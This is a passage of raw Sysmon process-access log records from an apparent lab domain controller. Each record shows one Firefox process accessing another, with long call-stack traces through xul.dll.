Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla 
Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09 10341000x800000000000000016873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla 
Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla 
Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 
10341000x800000000000000016867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla 
Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla 
Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a 10341000x800000000000000016861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.044{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla 
